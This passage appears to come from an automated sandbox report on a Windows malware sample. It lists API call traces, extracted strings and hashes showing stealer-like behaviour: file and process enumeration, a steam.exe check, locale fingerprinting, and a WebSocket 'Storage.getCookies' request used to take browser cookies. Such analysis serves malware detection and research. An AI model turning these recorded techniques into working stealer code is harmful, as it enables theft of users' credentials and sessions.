                                • lstrcat.KERNEL32(?,?), ref: 009CD642
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CD682
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CD6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009CD737
                                • FindClose.KERNEL32(00000000), ref: 009CD746
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: 529f66d5517d468f74f1e75e9edddc059bc42ca1ddf1bb01cb73c5249d701cdd
                                • Instruction ID: be3a769c208603b3795c8b88d6e09fc1480fbb4fe48c3e2be7976f716fa1e122
                                • Opcode Fuzzy Hash: 529f66d5517d468f74f1e75e9edddc059bc42ca1ddf1bb01cb73c5249d701cdd
                                • Instruction Fuzzy Hash: A1616371D102599BCB20EFB4DD88ADE77B8EF88310F0085A9E549A7251DF34AE45CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: 6bf6ff42c3114bc730cebc9b67582a4b60130a0093d690547c0a8aaf5ace98f9
                                • Instruction ID: 694183377434e8bcf8d0f1a119bb6fc9d499309424b9f7bb84f109a90242d35f
                                • Opcode Fuzzy Hash: 6bf6ff42c3114bc730cebc9b67582a4b60130a0093d690547c0a8aaf5ace98f9
                                • Instruction Fuzzy Hash: 58A25771D412699FDF20CFA8C9807EDBBB6AF88300F1585AAE519A7341DB705E85CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C2402
                                • lstrlen.KERNEL32(\*.*), ref: 009C240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 009C2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 111ecb86be92bc0b0e4be662033784d7d7e695293492864c660029f280f6e3b0
                                • Instruction ID: 98606858b87a0c67d31a6de9fa03ebe5d42015c22dc0cba74ef6adc082488d0d
                                • Opcode Fuzzy Hash: 111ecb86be92bc0b0e4be662033784d7d7e695293492864c660029f280f6e3b0
                                • Instruction Fuzzy Hash: 274183305102459BCB32EF68DF85BDE77B9EF94715F005128F84AAB2A1CF309C458B91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: hf>$(S7$,o[$5`$n$6Amw$<^~$PlR$V|o$r{%$GO
                                • API String ID: 0-3304821587
                                • Opcode ID: e1cd75ca2cc1008167274ae658112f66325e24735c94460db6c507e503899704
                                • Instruction ID: 7cd4c62c742a53c2a38f6f3f9d35ca7a249f47372ace2407dbb555c311a779ed
                                • Opcode Fuzzy Hash: e1cd75ca2cc1008167274ae658112f66325e24735c94460db6c507e503899704
                                • Instruction Fuzzy Hash: 39B204F390C2049FE304AE2DEC8567ABBE9EF94720F16892DE6C587744E63598418793
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009D46B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 009D46C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D46DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 009D46ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009D4702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 009D4711
                                • CloseHandle.KERNEL32(00000000), ref: 009D4718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D4726
                                • CloseHandle.KERNEL32(00000000), ref: 009D4731
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 366e680d8f076f45a4e3fbb562b42cc6d03c396a3f0733c022d19e49fc0fe778
                                • Instruction ID: 2a6dbb3e6fdcee00581d93cff081f947e19278be8710dc0fa44dd2e69952efdb
                                • Opcode Fuzzy Hash: 366e680d8f076f45a4e3fbb562b42cc6d03c396a3f0733c022d19e49fc0fe778
                                • Instruction Fuzzy Hash: 0F01F531641164ABE7209B60DCCCFFE377CEB49B11F000199F909EB280EF7499848BA4
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 009D4628
                                • Process32First.KERNEL32(00000000,00000128), ref: 009D4638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 009D4660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D4672
                                • CloseHandle.KERNEL32(00000000), ref: 009D467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: 26d53ef631f7a1c16c26d06405eae96f776da5521db83643fa14b701837c143c
                                • Instruction ID: 57ef816242910d5c47569c6b4873d437e1fee6803dacb437e294aedcdd8b9dbc
                                • Opcode Fuzzy Hash: 26d53ef631f7a1c16c26d06405eae96f776da5521db83643fa14b701837c143c
                                • Instruction Fuzzy Hash: 7A01A271601124ABD720EB60AC88FEA77BCEF09751F4401D6F909D6140EF74C9988BE5
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C4B7F
                                • lstrlen.KERNEL32(009E4CA8), ref: 009C4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4BA7
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009C4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C4BFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 28a2b6de051399eda86c88945b40a9b1db9206c20c67afc5f48936690361860d
                                • Instruction ID: 69086239dc82e83233b42b489a0bec19b266730fe184855457f8b88a7d9e371e
                                • Opcode Fuzzy Hash: 28a2b6de051399eda86c88945b40a9b1db9206c20c67afc5f48936690361860d
                                • Instruction Fuzzy Hash: 44313031A215559BCB22EF68EF85FDE77B9EF90325F100128F815AB291CB30DC058B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: _r$+8l~$/h`c$7?t$r{%$AQ-$TUl$lR}
                                • API String ID: 0-1946983368
                                • Opcode ID: d470b8e478e07bbc17f7d86b5a4f51760b7e07298b9f90975cb95057e0debd32
                                • Instruction ID: 8b3c4d34c8681597a423fbfaedb3b6c8bf5b5be546a91efe9ab61f559da4b739
                                • Opcode Fuzzy Hash: d470b8e478e07bbc17f7d86b5a4f51760b7e07298b9f90975cb95057e0debd32
                                • Instruction Fuzzy Hash: DDB2F6F3A0C2049FE304AF29EC8567AFBE5EF94720F16493DEAC5C7744E63598018696
                                APIs
                                  • Part of subcall function 009D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009D71FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 009D2D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 009D2DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 009D2DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 009D2DEC
                                • LocalFree.KERNEL32(00000000), ref: 009D2FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 43c14d6e71e95ddba6ec4d21b06f2f61597518d84cf54d8a672865f97341cf80
                                • Instruction ID: cc3e613aca217dfcf1052e5d0a36c2a50768897c0c2e205b93c2c22825466c2f
                                • Opcode Fuzzy Hash: 43c14d6e71e95ddba6ec4d21b06f2f61597518d84cf54d8a672865f97341cf80
                                • Instruction Fuzzy Hash: E5B11770940204CFC715CF18C988B99B7F5FB54329F29C5AAE408AB3A2D7769D86CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: }$#rw$$ba`$)/;}$9[uz$|->O$~^7
                                • API String ID: 0-3247793475
                                • Opcode ID: a705f7308a0eafa81f5ea4786de645c0bc73fd6023d4b451fb2e856b3a15f9a1
                                • Instruction ID: aad861f0a4987a2192180f6929f62ce08fa989d0f17fd87d85818283140eba5a
                                • Opcode Fuzzy Hash: a705f7308a0eafa81f5ea4786de645c0bc73fd6023d4b451fb2e856b3a15f9a1
                                • Instruction Fuzzy Hash: 67B205B360C6049FE7086E2DEC8567ABBE9EF94320F16893DE6C5C3744EA3558018797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2Go$6bwO$@w7g$O>$sdv~$xT"d
                                • API String ID: 0-3626091568
                                • Opcode ID: b71d70f5c327816c90ceecbd45b603e9b25111c505cdedd49a8bd7967f63b06e
                                • Instruction ID: 9e132c0fd023f04e89ea62d86dd2d28ad27478563e6b0e81b8c52135844b3135
                                • Opcode Fuzzy Hash: b71d70f5c327816c90ceecbd45b603e9b25111c505cdedd49a8bd7967f63b06e
                                • Instruction Fuzzy Hash: DAB208F360C204AFE7046E29EC8567AFBE9EF94720F16493DEAC5C3740EA3558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ._$:'Uk$Q]O$Q]O$bp?$kem
                                • API String ID: 0-957755949
                                • Opcode ID: ae22af60b129f2472b00a954a7b32c25a3c5989f0875bfe798b30815a23369e9
                                • Instruction ID: ca98734ab32436692417d0c14b809b37b916f042e980966342ab2e69393d12ed
                                • Opcode Fuzzy Hash: ae22af60b129f2472b00a954a7b32c25a3c5989f0875bfe798b30815a23369e9
                                • Instruction Fuzzy Hash: 6DB227F3A0C2049FD3046E2DEC8567ABBE9EF94720F1A493DEAC5C3744EA3558058697
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 009D2C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D2C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 009D2C58
                                • wsprintfA.USER32 ref: 009D2C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: b3b113d3da3e170bd96bbfcc8c69a06e3570f9f862093d157746200131807e1a
                                • Instruction ID: 76809dce8d0eda9a062b45b853ad9d7b9c72cad2e36c28a7a55acd3d0c3abe84
                                • Opcode Fuzzy Hash: b3b113d3da3e170bd96bbfcc8c69a06e3570f9f862093d157746200131807e1a
                                • Instruction Fuzzy Hash: 36012B71A40644ABCB189F58DC49F6DB77DEB84721F00436AF915DB3C0DB741D0486D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: >s$DK#<$rJv7$z;$zV?
                                • API String ID: 0-2299592823
                                • Opcode ID: 419704e4072458abee6674c987fea02ed19bd06d1259156c6c2e9c8b9d02ea56
                                • Instruction ID: c5ff6203251c75bcc8a2a8ab9078c21bd07b47732dcce2dc317b0c380d422c41
                                • Opcode Fuzzy Hash: 419704e4072458abee6674c987fea02ed19bd06d1259156c6c2e9c8b9d02ea56
                                • Instruction Fuzzy Hash: 24B2E6F360C6049FE304AE2DEC8566AFBE9EFD4320F16893DE6C583744EA3558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Dp{v$Gw}?$Z6?$oqVn$oj
                                • API String ID: 0-2096917618
                                • Opcode ID: 4a4810951c947092734681c2b34627ea0044216f25ba938f946611a669591b5a
                                • Instruction ID: c789ab9741c052a0334cf1f6d6fda1fa12da3f0ff16ff8e7957daa7a982a7834
                                • Opcode Fuzzy Hash: 4a4810951c947092734681c2b34627ea0044216f25ba938f946611a669591b5a
                                • Instruction Fuzzy Hash: 9AB206F360C204AFE3046E2DEC8567AFBE9EF94720F1A492DE6C4D3740EA3559058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Dl-.$I/p,$YYg$b;\{$}$7
                                • API String ID: 0-2756636191
                                • Opcode ID: cd2f35f1431408894731ee1c211ab4729a38258174ee60e9a0e3a424d8983512
                                • Instruction ID: 71a5b004da87a746544c2b0ac87a0934d57620842f5fbf814a62a80147832d68
                                • Opcode Fuzzy Hash: cd2f35f1431408894731ee1c211ab4729a38258174ee60e9a0e3a424d8983512
                                • Instruction Fuzzy Hash: AAB212F3A0C2009FE3046F2DEC8566ABBE5EF94760F1A493DEAC4C7744EA3558058693
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
